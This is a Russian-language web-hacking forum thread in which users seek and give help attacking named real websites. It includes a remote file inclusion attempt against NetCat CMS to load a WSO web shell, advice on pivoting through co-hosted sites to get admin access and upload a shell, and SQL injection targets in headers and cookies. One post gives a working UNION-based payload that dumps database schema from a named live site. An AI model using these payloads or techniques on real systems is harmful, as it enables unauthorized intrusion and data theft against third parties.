Старый 19.01.2013, 23:51   #2661
Iwashka
 
Регистрация: 25.09.2012
Сообщений: 15
Репутация: 0
По умолчанию

Здравствуйте, уважаемые коллеги.
В теме веб хака я полный новичек... Помогите, пожалуйста, разобраться с таким вопросом: есть какая-то старенькая версия нетката. Вывод сделал, потому что она использует jquery 1.4.4. Нашел только одну нормальную статью:
Цитата:
http://www.exploit-db.com/exploits/17823/
В моей версии site.info/search/, site.info/netcat/search/ данные пути отсутствуют. Остаётся второй вариант.
Цитата:
/netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://shell?
Вместо шелл, я указал путь site.ru/wso.txt В ответ получил: Unable to load file.
Значит не работает данная уязвимость? Должно был появиться шелл, верно?
Что посоветуете для NetCat'a?
Iwashka вне форума   Ответить с цитированием
Старый 20.01.2013, 08:32   #2662
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Цитата:
Сообщение от Iwashka Посмотреть сообщение
Здравствуйте, уважаемые коллеги.
В теме веб хака я полный новичек... Помогите, пожалуйста, разобраться с таким вопросом: есть какая-то старенькая версия нетката. Вывод сделал, потому что она использует jquery 1.4.4. Нашел только одну нормальную статью:
В моей версии site.info/search/, site.info/netcat/search/ данные пути отсутствуют. Остаётся второй вариант.
Вместо шелл, я указал путь site.ru/wso.txt В ответ получил: Unable to load file.
Значит не работает данная уязвимость? Должно был появиться шелл, верно?
Что посоветуете для NetCat'a?
Для реализации уязвимости "MODULE_FOLDER" как следует из сплойта:
// get global value (for admin mode) видим только под админом, что вообще теряет смысл, если есть админский акк.
А копать есть куда, сделать реверс сайта, посмотреть сторонние сайты на данном IP, поковырять их.
Или же исследовать текущий целевой сайт, возможно помимо нетката там и другие движки есть.
Так же рекомендую просканировать сайт на наличие разных файлов\каталогов на нем, помогает частенько обнаружить много интересного, как минимум phpinfo который для многого может пригодиться.
В админке нетката шелл льётся без проблем, поэтому за доступ админа можно и побороться.
netcat вне форума   Ответить с цитированием
Старый 20.01.2013, 10:38   #2663
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

помогите раскрутить,что то не получается
инъекция в заголовке в x-forwarded-for: 1'"
Код:
http://drive.s13.ru/?id=1
а то чё то туплю.
Faaax вне форума   Ответить с цитированием
Старый 20.01.2013, 10:59   #2664
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение
Row Subqueries, конечно, дает возможность возвращать больше одной колонки из подзапроса, но кроме как в WHERE это не применить, как я понял.
да, результат Row Subqueries можно использовать только в операциях сравнения.

Цитата:
Сообщение от Untitled Посмотреть сообщение
Почему JOIN c пустым набором дает пустой набор?
логика в данном случае (просто join) примерно та же, что и в [ 1 + 2 + null = null ]. только надо иметь в виду, что результат зароса/подзапроса это "объект" состоящий из списка (имен) колонок и списка строк(rows) значений колонок.

сравни вывод:
select * from (select 1,2 union select 3,4)s1 join (select * from (select 5,6)s3 where 1=1)s2
select * from (select 1,2 union select 3,4)s1 join (select * from (select 5,6)s3 where 1=2)s2
select * from (select 1,2 union select 3,4)s1 left join (select * from (select 5,6)s3 where 1=1)s2 on (1=1)
select * from (select 1,2 union select 3,4)s1 left join (select * from (select 5,6)s3 where 1=2)s2 on (1=1)
DrakonHaSh вне форума   Ответить с цитированием
Старый 20.01.2013, 18:55   #2665
Dr..VATSON
 
Аватар для Dr..VATSON
 
Регистрация: 28.08.2010
Сообщений: 1
Репутация: 0
По умолчанию

SQL cookie
Цитата:
http://trans-business.com/ru/services/?id=1
Cookie: e7bda26f9a55cd87fb6188181a8755d2=g2mujtgh3mq8irfd7 d3779jht3;

Там можно что то выудить? =\

Последний раз редактировалось Dr..VATSON; 20.01.2013 в 18:57..
Dr..VATSON вне форума   Ответить с цитированием
Старый 20.01.2013, 20:19   #2666
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Цитата:
Сообщение от Faaax Посмотреть сообщение
помогите раскрутить,что то не получается
инъекция в заголовке в x-forwarded-for: 1'"
Код:
http://drive.s13.ru/?id=1
а то чё то туплю.
Не вижу иньекцию, там вообще ошибка выскакивает, или вслепую определять?
netcat вне форума   Ответить с цитированием
Старый 20.01.2013, 21:42   #2667
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

она в самом низу страницы,или лучше исходник открыть и тоже в самом низу.
вывод ошибки
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '", 10.10.10.10.' AND `user_id` = '0')' at line 1

Последний раз редактировалось Faaax; 20.01.2013 в 22:19..
Faaax вне форума   Ответить с цитированием
Старый 20.01.2013, 22:22   #2668
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Просьба помочь со SQL:
Код:
http://mobyware.ru/programList.php?view=global'&search=3333333333
Тут судя по всему двойной запрос, кавычка попадает в первый, а результаты на экран выводятся второго запроса, результаты пустые конечно же, как раскрутить такой экземпляр не представляю...
Буду благодарен если кто поможет.
netcat вне форума   Ответить с цитированием
Старый 21.01.2013, 12:16   #2669
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от netcat Посмотреть сообщение
Просьба помочь со SQL:
Код:
http://mobyware.ru/programList.php?view=global'&search=3333333333
Тут судя по всему двойной запрос, кавычка попадает в первый, а результаты на экран выводятся второго запроса, результаты пустые конечно же, как раскрутить такой экземпляр не представляю...
Буду благодарен если кто поможет.
поискать параметр с одним запросам

_http://www.mobyware.ru/review.php?view=software&review_id=-48+union+select+1,2,3,4,5,6,7,8,(select(@x)from(se lect(@x:=0x00),(select(null)from(information_schem a.columns)where(table_schema!=0x696e666f726d617469 6f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c6 2723e,table_schema,0x2e,table_name,0x3a,column_nam e))))x)+--+
Flakt вне форума   Ответить с цитированием
Старый 22.01.2013, 17:00   #2670
Abadd0N
 
Регистрация: 04.11.2011
Сообщений: 29
Репутация: 0
По умолчанию

Цитата:
Тут судя по всему двойной запрос, кавычка попадает в первый, а результаты на экран выводятся второго запроса, результаты пустые конечно же, как раскрутить такой экземпляр не представляю...
Буду благодарен если кто поможет.
Там скорее всего не двойной запрос, а просто if/switch/case/etc на содержимое view= в зависимости от которой будет осуществляться тот или иной запрос (к примеру global или all)
Abadd0N вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot